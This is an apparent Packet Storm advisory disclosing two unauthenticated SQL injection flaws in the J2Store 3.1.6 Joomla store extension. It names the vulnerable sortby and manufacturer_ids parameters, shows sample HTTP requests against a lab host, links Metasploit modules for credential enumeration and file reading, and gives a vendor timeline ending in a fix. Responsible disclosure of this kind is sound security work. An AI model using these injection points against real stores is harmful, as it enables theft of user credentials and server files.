Joomla J2Store 3.1.6 SQL Injection

2015-07-11T00:00:00
ID PACKETSTORM:132658
Type packetstorm
Reporter Brandon Perry
Modified 2015-07-11T00:00:00

Description

                                        
                                            `J2Store v3.1.6, a Joomla! extension that adds basic store functionality to  
a Joomla! instance, suffered from two unauthenticated boolean-blind and  
error-based SQL injection vulnerabilities. Since February 2015, J2Store has  
had about 16,000 downloads as of this writing.  
  
  
The first vulnerability was in the sortby parameter within a request made  
while searching for products.  
  
POST /index.php HTTP/1.1  
Host: 192.168.1.3  
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0)  
Gecko/20100101 Firefox/37.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Connection: keep-alive  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 124  
  
search=&sortby=product_name+DESC&option=com_j2store&view=products&task=browse&Itemid=115  
  
  
  
The second vulnerability was in an advanced search multipart form request,  
within the manufacturer_ids parameters.  
  
POST /index.php HTTP/1.1  
Host: 192.168.1.3  
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0)  
Gecko/20100101 Firefox/37.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Connection: keep-alive  
Content-Type: multipart/form-data;  
boundary=---------------------------69182815810793866481457026727  
Content-Length: 1023  
  
-----------------------------69182815810793866481457026727  
Content-Disposition: form-data; name="pricefrom"  
  
0  
-----------------------------69182815810793866481457026727  
Content-Disposition: form-data; name="priceto"  
  
521  
-----------------------------69182815810793866481457026727  
Content-Disposition: form-data; name="manufacturer_ids[]"  
  
1  
-----------------------------69182815810793866481457026727  
Content-Disposition: form-data; name="option"  
  
com_j2store  
-----------------------------69182815810793866481457026727  
Content-Disposition: form-data; name="view"  
  
products  
-----------------------------69182815810793866481457026727  
Content-Disposition: form-data; name="task"  
  
browse  
-----------------------------69182815810793866481457026727  
Content-Disposition: form-data; name="Itemid"  
  
115  
-----------------------------69182815810793866481457026727  
Content-Disposition: form-data; name="9d0a4b9d6d4b46fc51d25844b91c2057"  
  
1  
-----------------------------69182815810793866481457026727--  
  
  
A Metasploit scanner module and two auxiliary modules are available on the  
ExploitHub store which will help you find and validate any vulnerable  
instances. A PCAP is included with each module.  
  
Free Metasploit scanner module:  
https://exploithub.com/j2store-3-1-6-sql-injection-scanner.html  
  
Metasploit User/Password Enumeration auxiliary module:  
https://exploithub.com/j2store-3-1-6-user-password-enumeration-via-sql-injection.html  
  
Metasploit Arbitrary File Read auxiliary module:  
https://exploithub.com/j2store-3-1-6-arbitrary-file-read-via-sql-injection.html  
  
  
Timeline  
July 7 2015: Reported to vendor  
July 7 2015: Vendor response asking for details  
July 7 2015: Details sent  
July 7 2015: Vendor sends email saying the vulnerabilities were fixed and a  
new version will be out soon  
July 8 2015: Version 3.1.7 released, advisory released with modules  
  
--   
http://volatile-minds.blogspot.com -- blog  
http://www.volatileminds.net -- website  
  
  
`